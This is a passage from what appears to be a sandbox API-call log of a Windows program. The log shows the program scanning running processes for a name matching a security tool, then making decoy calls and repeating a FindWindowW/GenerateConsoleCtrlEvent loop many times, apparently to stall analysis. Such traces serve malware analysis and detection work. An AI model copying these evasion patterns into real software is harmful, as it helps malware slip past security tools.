out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.533] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.533] lstrlenW (lpString="svchost.exe") returned 11 [0163.533] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.533] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.533] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.534] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.534] lstrlenW (lpString="winpoint.exe") returned 12 [0163.534] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.534] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.534] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.535] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.535] lstrlenW (lpString="cmd.exe") returned 7 [0163.535] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.535] lstrcmpW (lpString1="CMD.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.535] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.536] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.536] lstrlenW (lpString="conhost.exe") returned 11 [0163.536] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.536] lstrcmpW (lpString1="CONHOST.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.536] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.536] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.536] lstrlenW (lpString="PING.EXE") returned 8 [0163.536] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.536] lstrcmpW (lpString1="PING.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.536] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.537] CloseHandle (hObject=0xe0) returned 1 [0163.537] PrepareTape (hDevice=0x0, dwOperation=0x0, bImmediate=0) returned 0x6 [0163.537] CreateFileA (lpFileName="*(JIGFODHy8t9ij3g89eiw" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\*(jigfodhy8t9ij3g89eiw"), dwDesiredAccess=0x0, dwShareMode=0x6, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.537] GetThreadLocale () returned 0x409 [0163.537] EraseTape (hDevice=0xffffffff, dwEraseType=0x17, 
bImmediate=1) returned 0x6 [0163.537] CreateCompatibleDC (hdc=0x7401083e) returned 0x0 [0163.537] GetACP () returned 0x4e4 [0163.537] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, 
lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] 
FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () 
returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 
[0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, 
dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] 
GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") 
returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, 
lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] 
FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () 
returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 